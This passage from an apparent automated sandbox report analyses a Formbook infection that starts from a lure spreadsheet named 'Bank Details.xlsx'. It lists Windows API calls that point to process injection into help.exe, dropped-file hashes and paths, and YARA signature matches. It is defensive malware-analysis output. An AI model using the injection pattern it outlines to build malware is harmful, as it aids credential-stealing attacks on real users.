Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FA20 NtQueryInformationFile, 7_2_00B2FA20
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FA50 NtEnumerateValueKey, 7_2_00B2FA50
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FBE8 NtQueryVirtualMemory, 7_2_00B2FBE8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FC90 NtUnmapViewOfSection, 7_2_00B2FC90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FC30 NtOpenProcess, 7_2_00B2FC30
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B30C40 NtGetContextThread, 7_2_00B30C40
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FC48 NtSetInformationFile, 7_2_00B2FC48
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B31D80 NtSuspendThread, 7_2_00B31D80
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FD5C NtEnumerateKey, 7_2_00B2FD5C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FEA0 NtReadVirtualMemory, 7_2_00B2FEA0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FE24 NtWriteVirtualMemory, 7_2_00B2FE24
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FFFC NtCreateProcessEx, 7_2_00B2FFFC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B2FF34 NtQueueApcThread, 7_2_00B2FF34
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_000981D0 NtCreateFile, 7_2_000981D0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00098280 NtReadFile, 7_2_00098280
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00098300 NtClose, 7_2_00098300
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_000983B0 NtAllocateVirtualMemory, 7_2_000983B0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_000981CA NtCreateFile, 7_2_000981CA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009827A NtReadFile, 7_2_0009827A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_000982FA NtClose, 7_2_000982FA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 7_2_005C632E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 7_2_005C67C7
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_005C6332
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C67C2 NtQueryInformationProcess, 7_2_005C67C2
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_00403166
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_004046C3 4_2_004046C3
Source: C:\Users\Public\vbc.exe Code function: 4_2_004060D9 4_2_004060D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_004068B0 4_2_004068B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B869 5_2_0041B869
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C07B 5_2_0041C07B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C804 5_2_0041C804
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401174 5_2_00401174
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B985 5_2_0041B985
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CB98 5_2_0041CB98
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C6B 5_2_00408C6B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C70 5_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C2B 5_2_00408C2B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B4B3 5_2_0041B4B3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C58E 5_2_0041C58E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BE99 5_2_0041BE99
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF43 5_2_0041CF43
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CF0C 5_2_0041CF0C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BFD4 5_2_0041BFD4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CFA2 5_2_0041CFA2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095E0C6 5_2_0095E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095E2E9 5_2_0095E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A063BF 5_2_00A063BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_009863DB 5_2_009863DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00962305 5_2_00962305
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AA37B 5_2_009AA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E443E 5_2_009E443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0097C5F0 5_2_0097C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E05E3 5_2_009E05E3
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A6540 5_2_009A6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_00964680 5_2_00964680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096E6C1 5_2_0096E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A02622 5_2_00A02622
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AA634 5_2_009AA634
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096C7BC 5_2_0096C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096C85C 5_2_0096C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098286D 5_2_0098286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009629B2 5_2_009629B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A0098E 5_2_00A0098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009769FE 5_2_009769FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009F49F5 5_2_009F49F5
Source: C:\Users\Public\vbc.exe Code function: 5_2_009AC920 5_2_009AC920
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A0CBA4 5_2_00A0CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E6BCB 5_2_009E6BCB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A02C9C 5_2_00A02C9C
Source: C:\Users\Public\vbc.exe Code function: 5_2_009EAC5E 5_2_009EAC5E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00990D3B 5_2_00990D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096CD5B 5_2_0096CD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00992E2F 5_2_00992E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0097EE4C 5_2_0097EE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_009FCFB1 5_2_009FCFB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D2FDC 5_2_009D2FDC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00970F3F 5_2_00970F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098D005 5_2_0098D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0097905A 5_2_0097905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00963040 5_2_00963040
Source: C:\Users\Public\vbc.exe Code function: 5_2_009DD06D 5_2_009DD06D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009ED13F 5_2_009ED13F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A01238 5_2_00A01238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095F3CF 5_2_0095F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00967353 5_2_00967353
Source: C:\Users\Public\vbc.exe Code function: 5_2_00995485 5_2_00995485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00971489 5_2_00971489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0099D47D 5_2_0099D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A035DA 5_2_00A035DA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096351F 5_2_0096351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E579A 5_2_009E579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_009957C3 5_2_009957C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_009F771D 5_2_009F771D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009DF8C4 5_2_009DF8C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009FF8EE 5_2_009FF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E5955 5_2_009E5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_009E394B 5_2_009E394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A13A83 5_2_00A13A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095FBD7 5_2_0095FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_009EDBDA 5_2_009EDBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00987B00 5_2_00987B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_009FFDDD 5_2_009FFDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_009EBF14 5_2_009EBF14
Source: C:\Users\Public\vbc.exe Code function: 5_2_0098DF7C 5_2_0098DF7C
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C07B 5_1_0041C07B
Source: C:\Users\Public\vbc.exe Code function: 5_1_00401030 5_1_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_1_00401174 5_1_00401174
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B4B3 5_1_0041B4B3
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C58E 5_1_0041C58E
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B869 5_1_0041B869
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041C804 5_1_0041C804
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B985 5_1_0041B985
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CB98 5_1_0041CB98
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C6B 5_1_00408C6B
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C70 5_1_00408C70
Source: C:\Users\Public\vbc.exe Code function: 5_1_00408C2B 5_1_00408C2B
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402D90 5_1_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041BE99 5_1_0041BE99
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CF43 5_1_0041CF43
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CF0C 5_1_0041CF0C
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041BFD4 5_1_0041BFD4
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CFA2 5_1_0041CFA2
Source: C:\Users\Public\vbc.exe Code function: 5_1_00402FB0 5_1_00402FB0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3E0C6 7_2_00B3E0C6
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B6D005 7_2_00B6D005
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BBD06D 7_2_00BBD06D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B5905A 7_2_00B5905A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B43040 7_2_00B43040
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BCD13F 7_2_00BCD13F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3E2E9 7_2_00B3E2E9
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE1238 7_2_00BE1238
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE63BF 7_2_00BE63BF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B663DB 7_2_00B663DB
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3F3CF 7_2_00B3F3CF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B42305 7_2_00B42305
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B8A37B 7_2_00B8A37B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B47353 7_2_00B47353
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B75485 7_2_00B75485
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B51489 7_2_00B51489
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC443E 7_2_00BC443E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B7D47D 7_2_00B7D47D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B5C5F0 7_2_00B5C5F0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC05E3 7_2_00BC05E3
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE35DA 7_2_00BE35DA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B4351F 7_2_00B4351F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B86540 7_2_00B86540
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B44680 7_2_00B44680
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B4E6C1 7_2_00B4E6C1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B8A634 7_2_00B8A634
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE2622 7_2_00BE2622
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B4C7BC 7_2_00B4C7BC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC579A 7_2_00BC579A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B757C3 7_2_00B757C3
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BD771D 7_2_00BD771D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BDF8EE 7_2_00BDF8EE
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BBF8C4 7_2_00BBF8C4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B6286D 7_2_00B6286D
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B4C85C 7_2_00B4C85C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B429B2 7_2_00B429B2
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE098E 7_2_00BE098E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BD49F5 7_2_00BD49F5
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B569FE 7_2_00B569FE
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC5955 7_2_00BC5955
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC394B 7_2_00BC394B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BF3A83 7_2_00BF3A83
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BECBA4 7_2_00BECBA4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3FBD7 7_2_00B3FBD7
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BCDBDA 7_2_00BCDBDA
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BC6BCB 7_2_00BC6BCB
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B67B00 7_2_00B67B00
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BE2C9C 7_2_00BE2C9C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BCAC5E 7_2_00BCAC5E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BDFDDD 7_2_00BDFDDD
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B70D3B 7_2_00B70D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B4CD5B 7_2_00B4CD5B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B72E2F 7_2_00B72E2F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B5EE4C 7_2_00B5EE4C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BDCFB1 7_2_00BDCFB1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BB2FDC 7_2_00BB2FDC
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B50F3F 7_2_00B50F3F
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00BCBF14 7_2_00BCBF14
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B6DF7C 7_2_00B6DF7C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009C58E 7_2_0009C58E
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009C804 7_2_0009C804
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009CB98 7_2_0009CB98
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00088C2B 7_2_00088C2B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00088C6B 7_2_00088C6B
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00088C70 7_2_00088C70
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00082D90 7_2_00082D90
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009CF0C 7_2_0009CF0C
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009CFA0 7_2_0009CFA0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00082FB0 7_2_00082FB0
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C67C7 7_2_005C67C7
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C5062 7_2_005C5062
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C32FF 7_2_005C32FF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C1362 7_2_005C1362
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C3302 7_2_005C3302
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C75B2 7_2_005C75B2
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C08F9 7_2_005C08F9
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_005C0902 7_2_005C0902
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Bank Details.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll 2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 00419F80 appears 40 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0095DF5C appears 137 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0041A0B0 appears 52 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009CF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009A373B appears 253 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0095E2A8 appears 60 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009A3F92 appears 132 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00B83F92 appears 132 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00BAF970 appears 84 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00B8373B appears 253 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00B3DF5C appears 130 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 00B3E2A8 appears 60 times
Yara signature match
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
